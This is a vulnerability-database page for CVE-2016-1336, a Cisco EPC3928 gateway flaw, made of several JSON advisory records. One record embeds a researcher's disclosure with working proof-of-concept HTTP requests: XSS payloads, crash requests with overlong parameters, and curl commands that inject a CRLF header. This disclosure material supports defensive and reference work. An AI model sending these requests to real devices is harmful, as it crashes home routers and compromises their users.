CVE-2016-1336 (GCVE-0-2016-1336)

Vulnerability from cvelistv5 – Published: 2016-07-03 21:00 – Updated: 2024-08-05 22:55

Summary

Severity ?

No CVSS data available.

CWE

Assigner

cisco

References

URL

GHSA-GW3H-3JRX-85FR

Vulnerability from github – Published: 2022-05-14 02:47 – Updated: 2025-04-12 13:01

Details

Severity ?

7.5 (High)


                  
                    CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2016-1336"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-07-03T21:59:00Z",
    "severity": "HIGH"
  },
  "details": "goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a \"Gateway HTTP Corruption Denial of Service\" issue, aka Bug ID CSCuy28100.",
  "id": "GHSA-gw3h-3jrx-85fr",
  "modified": "2025-04-12T13:01:45Z",
  "published": "2022-05-14T02:47:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1336"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/39904"
    },
    {
      "type": "WEB",
      "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/91543"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

FKIE_CVE-2016-1336

Vulnerability from fkie_nvd - Published: 2016-07-03 21:59 - Updated: 2025-04-12 10:46

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
psirt@cisco.com	http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/	Exploit, URL Repurposed
psirt@cisco.com	http://www.securityfocus.com/archive/1/538627/100/0/threaded
psirt@cisco.com	http://www.securityfocus.com/bid/91543
psirt@cisco.com	https://www.exploit-db.com/exploits/39904/
af854a3a-2127-422b-91ae-364da2661108	http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/	Exploit, URL Repurposed
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/538627/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/91543
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/39904/

Impacted products

	Vendor	Product	Version
	cisco	epc3928_firmware	-
	cisco	epc3928	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:cisco:epc3928_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "8400FC4F-2601-4746-9997-3B00747C4F57",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:cisco:epc3928:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEBC35E0-EAC0-4D49-AE66-C67EFD50C171",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a \"Gateway HTTP Corruption Denial of Service\" issue, aka Bug ID CSCuy28100."
    },
    {
      "lang": "es",
      "value": "goform/Docsis_system en dispositivos Cisco EPC3928 permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda del dispositivo) a trav\u00e9s de un par\u00e1metro LanguageSelect largo, vinculado a un problema \"Gateway HTTP Corruption Denial of Service\", tambi\u00e9n conocido como Bug ID CSCuy28100."
    }
  ],
  "id": "CVE-2016-1336",
  "lastModified": "2025-04-12T10:46:40.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2016-07-03T21:59:05.633",
  "references": [
    {
      "source": "psirt@cisco.com",
      "tags": [
        "Exploit",
        "URL Repurposed"
      ],
      "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
    },
    {
      "source": "psirt@cisco.com",
      "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
    },
    {
      "source": "psirt@cisco.com",
      "url": "http://www.securityfocus.com/bid/91543"
    },
    {
      "source": "psirt@cisco.com",
      "url": "https://www.exploit-db.com/exploits/39904/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "URL Repurposed"
      ],
      "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/91543"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/39904/"
    }
  ],
  "sourceIdentifier": "psirt@cisco.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GSD-2016-1336

Vulnerability from gsd - Updated: 2023-12-13 01:21

Details

Aliases

CVE-2016-1336

Aliases

CVE-2016-1336

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2016-1336",
    "description": "goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a \"Gateway HTTP Corruption Denial of Service\" issue, aka Bug ID CSCuy28100.",
    "id": "GSD-2016-1336",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2016-1336"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2016-1336"
      ],
      "details": "goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a \"Gateway HTTP Corruption Denial of Service\" issue, aka Bug ID CSCuy28100.",
      "id": "GSD-2016-1336",
      "modified": "2023-12-13T01:21:23.964644Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "psirt@cisco.com",
        "ID": "CVE-2016-1336",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a \"Gateway HTTP Corruption Denial of Service\" issue, aka Bug ID CSCuy28100."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "20160608 Cisco EPC 3928 Multiple Vulnerabilities",
            "refsource": "BUGTRAQ",
            "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
          },
          {
            "name": "91543",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/91543"
          },
          {
            "name": "39904",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/39904/"
          },
          {
            "name": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/",
            "refsource": "MISC",
            "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:epc3928_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:epc3928:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "ID": "CVE-2016-1336"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a \"Gateway HTTP Corruption Denial of Service\" issue, aka Bug ID CSCuy28100."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-20"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/",
              "refsource": "MISC",
              "tags": [
                "Exploit"
              ],
              "url": "http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/"
            },
            {
              "name": "91543",
              "refsource": "BID",
              "tags": [],
              "url": "http://www.securityfocus.com/bid/91543"
            },
            {
              "name": "39904",
              "refsource": "EXPLOIT-DB",
              "tags": [],
              "url": "https://www.exploit-db.com/exploits/39904/"
            },
            {
              "name": "20160608 Cisco EPC 3928 Multiple Vulnerabilities",
              "refsource": "BUGTRAQ",
              "tags": [],
              "url": "http://www.securityfocus.com/archive/1/538627/100/0/threaded"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2018-10-09T19:59Z",
      "publishedDate": "2016-07-03T21:59Z"
    }
  }
}

VAR-201607-0004

Vulnerability from variot - Updated: 2025-04-13 23:17

goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a "Gateway HTTP Corruption Denial of Service" issue, aka Bug ID CSCuy28100. The CiscoEPC3928 is a wireless router product from Cisco. A security vulnerability exists in goform/Docsis_system on the Cisco EPC3928. Cisco Wireless Residential Gateway is prone to a denial-of-service vulnerability. This issue is being tracked by Cisco Bug ID CSCuy28100. # Title: Cisco EPC 3928 Multiple Vulnerabilities

Vendor: http://www.cisco.com/

Vulnerable Version(s): Cisco Model EPC3928 DOCSIS 3.0 8x4 Wireless Residential Gateway

CVE References: CVE-2015-6401 / CVE-2015-6402 / CVE-2016-1328 / CVE-2016-1336 / CVE-2016-1337

Author: Patryk Bogdan from Secorda security team (http://secorda.com/)

========

Summary: In recent security research, Secorda security team has found multiple vulnerabilities affecting Cisco EPC3928 Wireless Residential Gateway. Variants of this product can also be affected. Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key.

Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network.

Vulnerabilities: 1) Unauthorized Command Execution 2) Gateway Stored XSS 3) Gateway Client List DoS 4) Gateway Reflective XSS 5) Gateway HTTP Corruption DoS 6) "Stored" HTTP Response Injection 7) Boot Information Disclosure

========

PoC:

Unathorized Command Execution

1 - Channel selection request:

POST /goform/ChannelsSelection HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/ChannelsSelection.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 24

SAHappyUpstreamChannel=3

1 - Response:

HTTP/1.0 200 OK Server: PS HTTP Server Content-type: text/html Connection: close

RELOADvar totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);

dw(msg_goform34);dw(msg_goform35);refreshStatus();

2 - Clear logs request:

POST /goform/Docsis_log HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Docsis_log.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 41

BtnClearLog=Clear+Log&SnmpClearEventLog=0

2 - Response:

HTTP/1.0 302 Redirect Server: PS HTTP Server Location: http://192.168.1.1/Docsis_log.asp Content-type: text/html Connection: close

Gateway Stored and Reflective Cross Site Scripting

Example #1:

1 \x96 Stored XSS via username change request:

POST /goform/Administration HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Administration.asp Cookie: Lang=en; SessionID=2719880 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 165

working_mode=0&sysname=alert('XSS')&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common

1 \x96 Response:

HTTP/1.0 302 Redirect Server: PS HTTP Server Location: http://192.168.1.1/Administration.asp Content-type: text/html Connection: close

2 \x96 Redirect request:

GET /Administration.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Administration.asp Cookie: Lang=en; SessionID=2719880 DNT: 1 Connection: keep-alive

2 \x96 Response:

HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 15832

(...) dw(usertype); alert('XSS') (...) Example #2: #1 \x96 Reflected XSS via client list request: POST /goform/WClientMACList HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y #1 \x96 Response: HTTP/1.0 302 Redirect Server: PS HTTP Server Location: 192.168.1.1/WClientMACList.asp Content-type: text/html Connection: close #2 \x96 Redirect request: GET /WClientMACList.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive #2 \x96 Reponse: HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 7385 (...) (...) - Gateway Client List Denial of Service Device will crash after sending following request. # HTTP Request POST /goform/WClientMACList HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX - Gateway HTTP Corruption Denial of Service Device will crash after sending following request. # HTTP Request POST /goform/Docsis_system HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Docsis_system.asp Cookie: Lang=en; SessionID=348080 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 106 username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In - "Stored" HTTP Response Injection It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash). Additional data will be stored in device memory and returned with every http response on port 80 until reboot. devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10 HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 1469 devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10 HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Set-Cookie: Lang=en Set-Cookie: w00t Set-Cookie: SessionID=657670 Content-Length: 1469 - Boot Information Disclosure In early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials. Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo ======== CVE References: CVE-2015-6401 CVE-2015-6402 CVE-2016-1328 CVE-2016-1336 CVE-2016-1337 Cisco Bug ID\x92s: CSCux24935 CSCux24938 CSCux24941 CSCux24948 CSCuy28100 CSCux17178 Read more on our blog: http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0004",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "epc3928",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "epc3928",
        "scope": null,
        "trust": 1.4,
        "vendor": "cisco",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1336"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:cisco:epc3928",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Patryk Bogdan from Secorda security team.",
    "sources": [
      {
        "db": "BID",
        "id": "91543"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-1336",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2016-1336",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2016-04561",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-90155",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2016-1336",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2016-1336",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2016-1336",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2016-04561",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201606-295",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-90155",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-04561"
      },
      {
        "db": "VULHUB",
        "id": "VHN-90155"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-295"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-1336"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
